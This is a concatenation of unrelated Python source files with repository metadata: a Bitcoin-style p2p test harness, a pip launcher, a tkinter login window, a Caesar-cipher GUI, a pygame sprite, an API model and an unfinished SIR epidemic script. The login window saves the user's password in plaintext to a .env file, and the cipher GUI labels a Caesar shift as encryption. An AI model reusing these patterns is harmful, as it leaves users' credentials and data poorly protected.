        return "msg_ping(nonce=%08x)" % self.nonce
class msg_pong(object):
    """pong (BIP 31): echoes the nonce of the ping it answers."""
    command = b"pong"

    def __init__(self, nonce=0):
        self.nonce = nonce

    def deserialize(self, f):
        (self.nonce,) = struct.unpack("<Q", f.read(8))

    def serialize(self):
        return struct.pack("<Q", self.nonce)

    def __repr__(self):
        return "msg_pong(nonce=%08x)" % self.nonce
class msg_mempool(object):
    """mempool (BIP 35): empty request for the peer's mempool contents."""
    command = b"mempool"

    def __init__(self):
        pass

    def deserialize(self, f):
        pass  # no payload

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_mempool()"
class msg_sendheaders(object):
    """sendheaders (BIP 130): empty request for header announcements."""
    command = b"sendheaders"

    def __init__(self):
        pass

    def deserialize(self, f):
        pass  # no payload

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_sendheaders()"
# getheaders message has
# number of entries
# vector of hashes
# hash_stop (hash of last desired block header, 0 to get as many as possible)
class msg_getheaders(object):
    """getheaders request: a block locator plus a stop hash."""
    command = b"getheaders"

    def __init__(self):
        self.locator = CBlockLocator()
        self.hashstop = 0

    def deserialize(self, f):
        self.locator = CBlockLocator()
        self.locator.deserialize(f)
        self.hashstop = deser_uint256(f)

    def serialize(self):
        return self.locator.serialize() + ser_uint256(self.hashstop)

    def __repr__(self):
        return "msg_getheaders(locator=%s, stop=%064x)" \
            % (repr(self.locator), self.hashstop)
# headers message has
# <count> <vector of block headers>
class msg_headers(object):
    """headers message: a vector of block headers."""
    command = b"headers"

    def __init__(self):
        self.headers = []

    def deserialize(self, f):
        # comment in kredsd indicates these should be deserialized as blocks
        for blk in deser_vector(f, CBlock):
            self.headers.append(CBlockHeader(blk))

    def serialize(self):
        return ser_vector([CBlock(h) for h in self.headers])

    def __repr__(self):
        return "msg_headers(headers=%s)" % repr(self.headers)
class msg_reject(object):
    """reject message: explains why a previous block/tx message was rejected."""
    command = b"reject"
    REJECT_MALFORMED = 1

    def __init__(self):
        self.message = b""
        self.code = 0
        self.reason = b""
        self.data = 0

    def _carries_hash(self):
        # block/tx rejections (other than malformed) append the offending hash.
        return self.code != self.REJECT_MALFORMED and self.message in (b"block", b"tx")

    def deserialize(self, f):
        self.message = deser_string(f)
        self.code = struct.unpack("<B", f.read(1))[0]
        self.reason = deser_string(f)
        if self._carries_hash():
            self.data = deser_uint256(f)

    def serialize(self):
        r = ser_string(self.message)
        r += struct.pack("<B", self.code)
        r += ser_string(self.reason)
        if self._carries_hash():
            r += ser_uint256(self.data)
        return r

    def __repr__(self):
        return "msg_reject: %s %d %s [%064x]" \
            % (self.message, self.code, self.reason, self.data)
# Helper function
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf')):
    """Poll *predicate* under the global mininode lock until it returns True.

    Returns True on success, False once *attempts* tries or *timeout* seconds
    are exhausted.

    Bug fix: the original tracked elapsed time by adding 0.05 per iteration,
    but time.sleep(0.05) can sleep longer (and predicate() itself takes time),
    so the effective timeout could drift far beyond the requested one. The
    wall clock is now measured directly.
    """
    attempt = 0
    start = time.time()
    while attempt < attempts and time.time() - start < timeout:
        with mininode_lock:
            if predicate():
                return True
        attempt += 1
        time.sleep(0.05)
    return False
class msg_feefilter(object):
    """feefilter (BIP 133): minimum fee rate for transaction relay."""
    command = b"feefilter"

    def __init__(self, feerate=0):
        self.feerate = feerate

    def deserialize(self, f):
        (self.feerate,) = struct.unpack("<Q", f.read(8))

    def serialize(self):
        return struct.pack("<Q", self.feerate)

    def __repr__(self):
        return "msg_feefilter(feerate=%08x)" % self.feerate
class msg_sendcmpct(object):
    """sendcmpct (BIP 152): announce-flag plus compact block version."""
    command = b"sendcmpct"

    def __init__(self):
        self.announce = False
        self.version = 1

    def deserialize(self, f):
        (self.announce,) = struct.unpack("<?", f.read(1))
        (self.version,) = struct.unpack("<Q", f.read(8))

    def serialize(self):
        return struct.pack("<?", self.announce) + struct.pack("<Q", self.version)

    def __repr__(self):
        return "msg_sendcmpct(announce=%s, version=%lu)" % (self.announce, self.version)
class msg_cmpctblock(object):
    """cmpctblock message wrapping a P2PHeaderAndShortIDs payload."""
    command = b"cmpctblock"

    def __init__(self, header_and_shortids=None):
        self.header_and_shortids = header_and_shortids

    def deserialize(self, f):
        payload = P2PHeaderAndShortIDs()
        payload.deserialize(f)
        self.header_and_shortids = payload

    def serialize(self):
        return self.header_and_shortids.serialize()

    def __repr__(self):
        return "msg_cmpctblock(HeaderAndShortIDs=%s)" % repr(self.header_and_shortids)
class msg_getblocktxn(object):
    """getblocktxn message wrapping a BlockTransactionsRequest."""
    command = b"getblocktxn"

    def __init__(self):
        self.block_txn_request = None

    def deserialize(self, f):
        request = BlockTransactionsRequest()
        request.deserialize(f)
        self.block_txn_request = request

    def serialize(self):
        return self.block_txn_request.serialize()

    def __repr__(self):
        return "msg_getblocktxn(block_txn_request=%s)" % (repr(self.block_txn_request))
class msg_blocktxn(object):
    """blocktxn message carrying the transactions requested by getblocktxn."""
    command = b"blocktxn"

    def __init__(self):
        self.block_transactions = BlockTransactions()

    def deserialize(self, f):
        self.block_transactions.deserialize(f)

    def serialize(self):
        return self.block_transactions.serialize()

    def __repr__(self):
        return "msg_blocktxn(block_transactions=%s)" % (repr(self.block_transactions))
class msg_witness_blocktxn(msg_blocktxn):
    """blocktxn variant that serializes transactions with witness data."""

    def serialize(self):
        return self.block_transactions.serialize(with_witness=True)
# This is what a callback should look like for NodeConn
# Reimplement the on_* functions to provide handling for events
class NodeConnCB(object):
    """Base event-callback object for a NodeConn.

    Subclasses override the on_<command> handlers they care about; messages
    with no override fall through to the no-op defaults below.
    """
    def __init__(self):
        self.verack_received = False
        # deliver_sleep_time is helpful for debugging race conditions in p2p
        # tests; it causes message delivery to sleep for the specified time
        # before acquiring the global lock and delivering the next message.
        self.deliver_sleep_time = None
        # Remember the services our peer has advertised
        self.peer_services = None

    def set_deliver_sleep_time(self, value):
        with mininode_lock:
            self.deliver_sleep_time = value

    def get_deliver_sleep_time(self):
        with mininode_lock:
            return self.deliver_sleep_time

    # Spin until verack message is received from the node.
    # Tests may want to use this as a signal that the test can begin.
    # This can be called from the testing thread, so it needs to acquire the
    # global lock.
    def wait_for_verack(self):
        while True:
            with mininode_lock:
                if self.verack_received:
                    return
            time.sleep(0.05)

    def deliver(self, conn, message):
        """Dispatch *message* to the matching on_<command> handler."""
        deliver_sleep = self.get_deliver_sleep_time()
        if deliver_sleep is not None:
            time.sleep(deliver_sleep)
        with mininode_lock:
            try:
                getattr(self, 'on_' + message.command.decode('ascii'))(conn, message)
            except:
                # NOTE(review): bare except swallows everything (including
                # KeyboardInterrupt) and only prints to stdout — consider
                # narrowing to `except Exception` and logging instead.
                print("ERROR delivering %s (%s)" % (repr(message),
                                                    sys.exc_info()[0]))

    def on_version(self, conn, message):
        if message.nVersion >= 209:
            conn.send_message(msg_verack())
        # Negotiate the lowest common protocol version for outbound messages.
        conn.ver_send = min(MY_VERSION, message.nVersion)
        if message.nVersion < 209:
            conn.ver_recv = conn.ver_send
        conn.nServices = message.nServices

    def on_verack(self, conn, message):
        conn.ver_recv = conn.ver_send
        self.verack_received = True

    def on_inv(self, conn, message):
        # Default behaviour: request every advertised object (type 0 = error).
        want = msg_getdata()
        for i in message.inv:
            if i.type != 0:
                want.inv.append(i)
        if len(want.inv):
            conn.send_message(want)

    # Default no-op handlers; override in subclasses as needed.
    def on_addr(self, conn, message): pass
    def on_alert(self, conn, message): pass
    def on_getdata(self, conn, message): pass
    def on_getblocks(self, conn, message): pass
    def on_tx(self, conn, message): pass
    def on_block(self, conn, message): pass
    def on_getaddr(self, conn, message): pass
    def on_headers(self, conn, message): pass
    def on_getheaders(self, conn, message): pass

    def on_ping(self, conn, message):
        # Only BIP 31 pings carry a nonce and expect a pong reply.
        if conn.ver_send > BIP0031_VERSION:
            conn.send_message(msg_pong(message.nonce))

    def on_reject(self, conn, message): pass
    def on_open(self, conn): pass
    def on_close(self, conn): pass
    def on_mempool(self, conn): pass
    def on_pong(self, conn, message): pass
    def on_feefilter(self, conn, message): pass
    def on_sendheaders(self, conn, message): pass
    def on_sendcmpct(self, conn, message): pass
    def on_cmpctblock(self, conn, message): pass
    def on_getblocktxn(self, conn, message): pass
    def on_blocktxn(self, conn, message): pass
# More useful callbacks and functions for NodeConnCB's which have a single NodeConn
class SingleNodeConnCB(NodeConnCB):
    """NodeConnCB convenience subclass bound to exactly one connection."""

    def __init__(self):
        NodeConnCB.__init__(self)
        self.connection = None
        # Monotonically increasing nonce used to pair pings with pongs.
        self.ping_counter = 1
        self.last_pong = msg_pong()

    def add_connection(self, conn):
        self.connection = conn

    # Wrapper for the NodeConn's send_message function
    def send_message(self, message):
        self.connection.send_message(message)

    def send_and_ping(self, message):
        self.send_message(message)
        self.sync_with_ping()

    def on_pong(self, conn, message):
        self.last_pong = message

    # Sync up with the node
    def sync_with_ping(self, timeout=30):
        """Send a ping with a fresh nonce and wait for the matching pong."""
        def received_pong():
            return (self.last_pong.nonce == self.ping_counter)
        self.send_message(msg_ping(nonce=self.ping_counter))
        success = wait_until(received_pong, timeout=timeout)
        self.ping_counter += 1
        return success
# The actual NodeConn class
# This class provides an interface for a p2p connection to a specified node
class NodeConn(asyncore.dispatcher):
    """asyncore-based p2p connection to a node; parses and frames messages."""

    # Map of wire command -> message class used when deserializing.
    messagemap = {
        b"version": msg_version,
        b"verack": msg_verack,
        b"addr": msg_addr,
        b"alert": msg_alert,
        b"inv": msg_inv,
        b"getdata": msg_getdata,
        b"getblocks": msg_getblocks,
        b"tx": msg_tx,
        b"block": msg_block,
        b"getaddr": msg_getaddr,
        b"ping": msg_ping,
        b"pong": msg_pong,
        b"headers": msg_headers,
        b"getheaders": msg_getheaders,
        b"reject": msg_reject,
        b"mempool": msg_mempool,
        b"feefilter": msg_feefilter,
        b"sendheaders": msg_sendheaders,
        b"sendcmpct": msg_sendcmpct,
        b"cmpctblock": msg_cmpctblock,
        b"getblocktxn": msg_getblocktxn,
        b"blocktxn": msg_blocktxn
    }
    # Network magic prefixes used to frame every message.
    MAGIC_BYTES = {
        "mainnet": b"\xf9\xbe\xb4\xd9",   # mainnet
        "testnet3": b"\x0b\x11\x09\x07",  # testnet3
        "regtest": b"\xfa\xbf\xb5\xda",   # regtest
    }

    def __init__(self, dstaddr, dstport, rpc, callback, net="regtest", services=NODE_NETWORK, send_version=True):
        asyncore.dispatcher.__init__(self, map=mininode_socket_map)
        self.log = logging.getLogger("NodeConn(%s:%d)" % (dstaddr, dstport))
        self.dstaddr = dstaddr
        self.dstport = dstport
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sendbuf = b""
        self.recvbuf = b""
        # Assume protocol 209 until the version handshake negotiates otherwise.
        self.ver_send = 209
        self.ver_recv = 209
        self.last_sent = 0
        self.state = "connecting"
        self.network = net
        self.cb = callback
        self.disconnect = False
        self.nServices = 0
        if send_version:
            # stuff version msg into sendbuf
            vt = msg_version()
            vt.nServices = services
            vt.addrTo.ip = self.dstaddr
            vt.addrTo.port = self.dstport
            vt.addrFrom.ip = "0.0.0.0"
            vt.addrFrom.port = 0
            self.send_message(vt, True)
        print('MiniNode: Connecting to Kreds Node IP # ' + dstaddr + ':' \
              + str(dstport))
        try:
            self.connect((dstaddr, dstport))
        except:
            self.handle_close()
        self.rpc = rpc

    def show_debug_msg(self, msg):
        self.log.debug(msg)

    def handle_connect(self):
        if self.state != "connected":
            self.show_debug_msg("MiniNode: Connected & Listening: \n")
            self.state = "connected"
            self.cb.on_open(self)

    def handle_close(self):
        self.show_debug_msg("MiniNode: Closing Connection to %s:%d... "
                            % (self.dstaddr, self.dstport))
        self.state = "closed"
        self.recvbuf = b""
        self.sendbuf = b""
        try:
            self.close()
        except:
            pass
        self.cb.on_close(self)

    def handle_read(self):
        try:
            t = self.recv(8192)
            if len(t) > 0:
                self.recvbuf += t
                self.got_data()
        except:
            # NOTE(review): bare except silently drops read errors.
            pass

    def readable(self):
        return True

    def writable(self):
        with mininode_lock:
            pre_connection = self.state == "connecting"
            length = len(self.sendbuf)
        return (length > 0 or pre_connection)

    def handle_write(self):
        with mininode_lock:
            # asyncore does not expose socket connection, only the first read/write
            # event, thus we must check connection manually here to know when we
            # actually connect
            if self.state == "connecting":
                self.handle_connect()
            if not self.writable():
                return
            try:
                sent = self.send(self.sendbuf)
            except:
                self.handle_close()
                return
            self.sendbuf = self.sendbuf[sent:]

    def got_data(self):
        """Parse complete framed messages out of recvbuf and dispatch them."""
        try:
            while True:
                if len(self.recvbuf) < 4:
                    return
                if self.recvbuf[:4] != self.MAGIC_BYTES[self.network]:
                    raise ValueError("got garbage %s" % repr(self.recvbuf))
                if self.ver_recv < 209:
                    # Old framing: magic(4) + command(12) + length(4), no checksum.
                    if len(self.recvbuf) < 4 + 12 + 4:
                        return
                    command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
                    msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
                    checksum = None
                    if len(self.recvbuf) < 4 + 12 + 4 + msglen:
                        return
                    msg = self.recvbuf[4+12+4:4+12+4+msglen]
                    self.recvbuf = self.recvbuf[4+12+4+msglen:]
                else:
                    # Modern framing adds a 4-byte double-SHA256 checksum.
                    if len(self.recvbuf) < 4 + 12 + 4 + 4:
                        return
                    command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
                    msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
                    checksum = self.recvbuf[4+12+4:4+12+4+4]
                    if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
                        return
                    msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
                    th = sha256(msg)
                    h = sha256(th)
                    if checksum != h[:4]:
                        raise ValueError("got bad checksum " + repr(self.recvbuf))
                    self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
                if command in self.messagemap:
                    f = BytesIO(msg)
                    t = self.messagemap[command]()
                    t.deserialize(f)
                    self.got_message(t)
                else:
                    # NOTE(review): `command` is bytes here, so this str+bytes
                    # concatenation raises TypeError (caught by the handler
                    # below) — it should decode `command` first.
                    self.show_debug_msg("Unknown command: '" + command + "' " +
                                        repr(msg))
        except Exception as e:
            print('got_data:', repr(e))
            # import traceback
            # traceback.print_tb(sys.exc_info()[2])

    def send_message(self, message, pushbuf=False):
        """Frame *message* (magic + command + length [+ checksum]) and queue it."""
        if self.state != "connected" and not pushbuf:
            raise IOError('Not connected, no pushbuf')
        self.show_debug_msg("Send %s" % repr(message))
        command = message.command
        data = message.serialize()
        tmsg = self.MAGIC_BYTES[self.network]
        tmsg += command
        tmsg += b"\x00" * (12 - len(command))
        tmsg += struct.pack("<I", len(data))
        if self.ver_send >= 209:
            th = sha256(data)
            h = sha256(th)
            tmsg += h[:4]
        tmsg += data
        with mininode_lock:
            self.sendbuf += tmsg
            self.last_sent = time.time()

    def got_message(self, message):
        if message.command == b"version":
            # Old peers need the nonce-less pre-BIP31 ping.
            if message.nVersion <= BIP0031_VERSION:
                self.messagemap[b'ping'] = msg_ping_prebip31
        # Keep-alive: ping if nothing was sent in the last 30 minutes.
        if self.last_sent + 30 * 60 < time.time():
            self.send_message(self.messagemap[b'ping']())
        self.show_debug_msg("Recv %s" % repr(message))
        self.cb.deliver(self, message)

    def disconnect_node(self):
        # Actual teardown happens in the NetworkThread loop.
        self.disconnect = True
class NetworkThread(Thread):
    """Background thread that drives the asyncore loop for all NodeConns."""

    def run(self):
        while mininode_socket_map:
            # We check for whether to disconnect outside of the asyncore
            # loop to workaround the behavior of asyncore when using
            # select
            disconnected = []
            for fd, obj in mininode_socket_map.items():
                if obj.disconnect:
                    disconnected.append(obj)
            [ obj.handle_close() for obj in disconnected ]
            asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1)
# An exception we can raise if we detect a potential disconnect
# (p2p or rpc) before the test is complete
class EarlyDisconnectError(Exception):
    """Raised when a p2p or rpc connection drops before the test finishes."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return "%r" % (self.value,)
| [
"blockartlab@protonmail.com"
] | blockartlab@protonmail.com |
649a84ef287090c60f94004c2eeb3eba7d6ce157 | bb122a6ed6950ad049cef5d4c2885cdb105a9757 | /venv/bin/pip | 4885b9791de0ea049835db968dac4f107e8ed2e0 | [] | no_license | Kreisso/Boston_market_data | 654d0e390ad190222bfca62b6acca86e3b4c5b2c | c34f502412eadc6542589fbed0de6ff1f8a5d20c | refs/heads/master | 2021-09-28T00:12:12.237274 | 2018-11-12T16:42:11 | 2018-11-12T16:42:11 | 157,244,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | #!/Users/kreisso/PycharmProjects/lab2/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"polakmaciej.web@gmail.com"
] | polakmaciej.web@gmail.com | |
3fb99e4416e7ac91d21b8d79e010e34c69830ce0 | d4c9ed6499d71e19db4bfef8562219ad1a3ff0d9 | /gym_log/login_window.py | a701532d7e74d8b2f0a5a20e1def98767d2d4e4f | [] | no_license | neilmarshall/gym-log-gui | 43f5d951e6dfb3ac37f9b4c7fe3a2abfaea90980 | 505272e0a4cafd0cdad751d0213134e890dd5e51 | refs/heads/master | 2022-12-11T10:05:09.187996 | 2022-04-03T19:09:45 | 2022-04-03T19:09:45 | 203,452,899 | 1 | 0 | null | 2022-12-08T06:03:12 | 2019-08-20T20:53:36 | Python | UTF-8 | Python | false | false | 3,892 | py | import os
import re
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
basedir = os.path.split(basedir)[0]
load_dotenv(os.path.join(basedir, '.env'))
class LoginWindow(ttk.Frame):
"""Subclass of tkinter.Frame - controls application login"""
def __init__(self, parent, thread_pool, gym_log_controller):
"""Constructor method"""
super().__init__(parent)
self._thread_pool = thread_pool
self._gym_log_controller = gym_log_controller
self._username_entry = tk.StringVar()
self._password_entry = tk.StringVar()
self._remember_login = tk.IntVar()
def launch(self, successful_login_callback):
"""Build and launch login window"""
self.pack()
# add username and password input widgets
login_widgets = ttk.Frame(self)
login_widgets.pack(padx=10, pady=5)
ttk.Label(login_widgets, text="Username").grid(row=0, column=0)
ttk.Entry(login_widgets, textvariable=self._username_entry).grid(row=0, column=1, columnspan=2)
self._password_entry.set(os.environ.get('DEFAULT_PASSWORD') or '')
ttk.Label(login_widgets, text="Password").grid(row=1, column=0)
ttk.Entry(login_widgets, textvariable=self._password_entry, show='*').grid(row=1, column=1, columnspan=2)
self._username_entry.set(os.environ.get('DEFAULT_USERNAME') or '')
# add login button and 'remember me' functionality
button_widgets = ttk.Frame(self)
button_widgets.pack(padx=10, pady=5)
ttk.Button(button_widgets, text="Login",
command=lambda: self._login(successful_login_callback)) \
.grid(row=2, column=1)
ttk.Checkbutton(button_widgets, text="Remember me", variable=self._remember_login).grid(row=2, column=2)
self._remember_login.set(True)
def _login(self, successful_login_callback):
"""Set a user token on the gym log controller"""
def begin_login():
username, password = self._username_entry.get(), self._password_entry.get()
is_login_successful = self._gym_log_controller.check_token(username, password)
if is_login_successful:
if self._remember_login.get():
self._store_login_details(username, password)
self._gym_log_controller.set_exercises()
return is_login_successful
def end_login(future):
progress_bar.stop()
progress_window.destroy()
if future.result():
self.destroy()
successful_login_callback()
else:
messagebox.showwarning("404 - Unauthorized Access",
"Login attempt failed - please try again")
progress_window = tk.Toplevel(self)
progress_frame = ttk.Frame(progress_window)
progress_frame.pack()
ttk.Label(progress_frame, text="Requesting login token...").pack()
progress_bar = ttk.Progressbar(progress_frame, mode="indeterminate")
progress_bar.pack()
progress_bar.start()
self._thread_pool.submit(begin_login).add_done_callback(end_login)
def _store_login_details(self, username, password):
def keep_setting(setting):
username_match = re.match(r'^\s*DEFAULT_USERNAME=.*$', setting)
password_match = re.match(r'\s*DEFAULT_PASSWORD=.*$', setting)
return setting and not username_match and not password_match
with open('.env') as f:
current_settings = f.read().split('\n')
with open('.env', 'w') as f:
f.write(f'DEFAULT_USERNAME={username}\n')
f.write(f'DEFAULT_PASSWORD={password}\n')
f.writelines('\n'.join(filter(keep_setting, current_settings)))
| [
"neil.marshall@dunelm.org.uk"
] | neil.marshall@dunelm.org.uk |
2df490ce7eb949a7e322c379697be793bc0f5780 | 87e80b44ef471bf5e0a88f005850e09c64f7a8a5 | /cipherGUI.py | 174476ccc37ebb27a4916c4d6f131870cc9bd558 | [] | no_license | KjEndurance/Cipher-GUI | cdb54cc90bf1393c54b233bbabbfc4d671c3ca88 | d47ce517ede0320f29ec369ad176b334f39ece87 | refs/heads/main | 2023-03-02T17:09:48.540461 | 2021-02-13T16:37:21 | 2021-02-13T16:37:21 | 338,615,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,280 | py | import CaesarCipher as cp
from tkinter import Tk, Frame, Label, Text, Button, Menu
class caesarCipherGUI(Frame):
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
self.constructGUI()
def constructGUI(self):
self.parent.title("Encryption Software")
self.parent.geometry("700x700+100+100")
encryptLabel = Label(self.parent, text="Message to Encrypt")
encryptLabel.place(x=10, y=10)
decryptLabel = Label(self.parent, text="Message to Decrypt")
decryptLabel.place(x=570, y=10)
#Encrypt/Decrypt Text Boxes
self.encryptText = Text(self.parent, width=40, height=20, wrap='word')
self.encryptText.place(x=10, y=40)
self.resultText = Text(self.parent, width=40, height=20, wrap='word')
self.resultText.place(x=360, y=40)
#Encrypt/Decrypt Buttons
self.encryptButton = Button(self.parent, text='Encrypt Message', command=self.encryptPressed)
self.encryptButton.place(x=80, y=400)
self.decryptButton = Button(self.parent, text='Decrypt Message', command=self.decryptPressed)
self.decryptButton.place(x=500, y=400)
#Keypad
self.button1 = Button(self.parent, text='1')
self.button1.config(command= lambda: self.numberPressed(self.button1.cget('text')))
self.button1.place(x=325, y=530)
self.button2 = Button(self.parent, text='2')
self.button2.config(command= lambda: self.numberPressed(self.button2.cget('text')))
self.button2.place(x=350, y=530)
self.button3 = Button(self.parent, text='3')
self.button3.config(command= lambda: self.numberPressed(self.button3.cget('text')))
self.button3.place(x=375, y=530)
self.button4 = Button(self.parent, text='4')
self.button4.config(command= lambda: self.numberPressed(self.button4.cget('text')))
self.button4.place(x=325, y=565)
self.button5 = Button(self.parent, text='5')
self.button5.config(command= lambda: self.numberPressed(self.button5.cget('text')))
self.button5.place(x=350, y=565)
self.button6 = Button(self.parent, text='6')
self.button6.config(command= lambda: self.numberPressed(self.button6.cget('text')))
self.button6.place(x=375, y=565)
self.button7 = Button(self.parent, text='7')
self.button7.config(command= lambda: self.numberPressed(self.button7.cget('text')))
self.button7.place(x=325, y=600)
self.button8 = Button(self.parent, text='8')
self.button8.config(command= lambda: self.numberPressed(self.button8.cget('text')))
self.button8.place(x=350, y=600)
self.button9 = Button(self.parent, text='9')
self.button9.config(command= lambda: self.numberPressed(self.button9.cget('text')))
self.button9.place(x=375, y=600)
self.button0 = Button(self.parent, text='0')
self.button0.config(command= lambda: self.numberPressed(self.button0.cget('text')))
self.button0.place(x=350, y=635)
self.numpadBackspace = Button(self.parent, text='<--', command=self.backspacePressed)
self.numpadBackspace.place(x=300, y=635)
self.numpadClear = Button(self.parent, text='CLR', command=self.clearPressed)
self.numpadClear.place(x=380, y=635)
self.numpadDisplay = Text(self.parent, width=12, height=1, state='disabled')
self.numpadDisplay.place(x=310, y=490)
numpadLabel = Label(self.parent, text='Enter key for Encryption and Decryption')
numpadLabel.place(x=260, y=460)
def encryptPressed(self):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) > 0:
message = self.encryptText.get('1.0', 'end-1c')
encrypted = cp.encrypt(message, int(PIN))
self.resultText.delete('1.0', 'end')
self.resultText.insert('1.0', encrypted)
def decryptPressed(self):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) > 0:
message = self.resultText.get('1.0', 'end-1c')
decrypted = cp.decrypt(message, int(PIN))
self.encryptText.delete('1.0', 'end')
self.encryptText.insert('1.0', decrypted)
def numberPressed(self, num):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) < 12:
self.numpadDisplay.config(state='normal')
self.numpadDisplay.insert('end', num)
print(int(num))
self.numpadDisplay.config(state='disabled')
def backspacePressed(self):
PIN = self.numpadDisplay.get('1.0', 'end-1c')
if len(PIN) > 0:
self.numpadDisplay.config(state='normal')
self.numpadDisplay.delete('1.0', 'end-1c')
self.numpadDisplay.insert('1.0', PIN[:-1])
self.numpadDisplay.config(state='disabled')
def clearPressed(self):
self.numpadDisplay.config(state='normal')
self.numpadDisplay.delete('1.0', 'end-1c')
self.numpadDisplay.config(state='disabled')
# Build the main window and hand control to the Tk event loop
# (blocks until the window is closed).
root = Tk()
GUI = caesarCipherGUI(root)
root.mainloop()
"root@DESKTOP-BSRUU7S.localdomain"
] | root@DESKTOP-BSRUU7S.localdomain |
6e3d9e6952a135e6cb57aa35e9ce3d3c16d16ec7 | 17abfd2de3370173c043275e21d642beed66c8d2 | /bullet.py | 6e687aeba36c62b6cc4fa8f90b5dc38d5d6039c3 | [] | no_license | NataliTrifonova/Alien_Invasion | 447185d2efd4b91c7c12677321ef3d2c3f113393 | af3676b7e7f4ee2267e11f84388cbe543dbbb858 | refs/heads/master | 2022-02-20T09:44:08.420958 | 2019-10-10T19:03:02 | 2019-10-10T19:03:02 | 214,255,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,310 | py | import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
'''Класс для управления пулями, выпущенными из корабля.'''
def __init__(self, ai_settings, screen, ship):
'''Создает объект пули в текущей позиции корабля.'''
super().__init__()
self.screen = screen
#создание пули в позиции (0,0) и назначение правильной позиции.
self.rect = pygame.Rect(0, 0, ai_settings.bullet_width,
ai_settings.bullet_height)
self.rect.centerx = ship.rect.centerx
self.rect.top = ship.rect.top
#позиция пули хранится в вещественном формате
self.y = float(self.rect.y)
self.color = ai_settings.bullet_color
self.speed_factor = ai_settings.bullet_speed_factor
def update(self):
'''Перемещает пулю вверх по экрану.'''
#обновление позиции пули в вещественном формате.
self.y -= self.speed_factor
#обновление позиции прямоугольника.
self.rect.y = self.y
def draw_bullet(self):
'''Вывод пули на экран.'''
pygame.draw.rect(self.screen, self.color, self.rect)
| [
"natali.trifonova.99@mail.ru"
] | natali.trifonova.99@mail.ru |
78743902ed67eb89cb11381400b6ca5e04e29487 | 72ccb57a10d52fb246d39d0bb94399b39e6c360e | /env/Lib/site-packages/vsts_info_provider/models/vsts_info.py | 9b80e2088e5c720e6bc0046f69b4e0f6921b405d | [] | no_license | malorydodge/SentimentAnalysis | c0ebaf9c8b47c63203c20a1018876c72382497f8 | 2d3d3fc12d1d215f448368c5dd67621002317ddb | refs/heads/master | 2023-05-10T16:37:59.784331 | 2019-09-17T16:26:23 | 2019-09-17T16:26:23 | 209,086,104 | 0 | 1 | null | 2023-05-01T21:15:48 | 2019-09-17T15:08:54 | Dockerfile | UTF-8 | Python | false | false | 1,043 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 1.0.1.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VstsInfo(Model):
    """VstsInfo.

    Aggregates a VSTS/Azure DevOps server URL with its collection and
    repository details.  (AutoRest-generated model - the file header warns
    that manual changes may be lost on regeneration.)

    :param server_url:
    :type server_url: str
    :param collection_info:
    :type collection_info: object
    :param repository_info:
    :type repository_info: object
    """

    # msrest (de)serialization map: attribute -> wire key + declared type.
    # Note the wire keys are 'collection'/'repository', not the *_info
    # attribute names.
    _attribute_map = {
        'server_url': {'key': 'serverUrl', 'type': 'str'},
        'collection_info': {'key': 'collection', 'type': 'CollectionInfo'},
        'repository_info': {'key': 'repository', 'type': 'RepositoryInfo'},
    }

    def __init__(self, server_url=None, collection_info=None, repository_info=None):
        """Store the three optional components without validation."""
        self.server_url = server_url
        self.collection_info = collection_info
        self.repository_info = repository_info
| [
"malorydodge@gmail.com"
] | malorydodge@gmail.com |
282f0bd5db6b6d07789e8b6b3f03a2bb8fd906f4 | 1de3ff16f4e114cbbc2b52cef2955ab903ff8744 | /Example/epidemic.py | 0c27d8d4c7010cfd6ada01b62adc303559fed215 | [] | no_license | armoreau/master-thesis | 41ea14c9b52436a818992d5a7b7a425e400e415f | 172651106095dad5bfdc8202e3908a465abb8f1c | refs/heads/master | 2023-05-15T00:34:31.801709 | 2021-06-12T01:40:20 | 2021-06-12T01:40:20 | 304,108,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | import matplotlib.pyplot as plt
#Add parent folder to the path. Code taken from https://codeolives.com/2020/01/10/python-reference-module-in-parent-directory/
import os, sys
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.append(parentdir)
from ode45 import ode45
def ode(t, y, beta, gamma, N):
    """SIR epidemic right-hand side; y = [susceptible, infected, immune]."""
    infection_flow = beta * y[0] * y[1] / N   # S -> I transfer rate
    recovery_flow = gamma * y[1]              # I -> R transfer rate
    return [-infection_flow, infection_flow - recovery_flow, recovery_flow]
tspan = [0, 60]     # simulate 60 days
y0 = [99, 1, 0]     # initial [healthy, infected, immune] counts
beta = 400/365      # infection rate (contacts per day)
gamma = 1/13        # recovery rate (1 / infectious period in days)
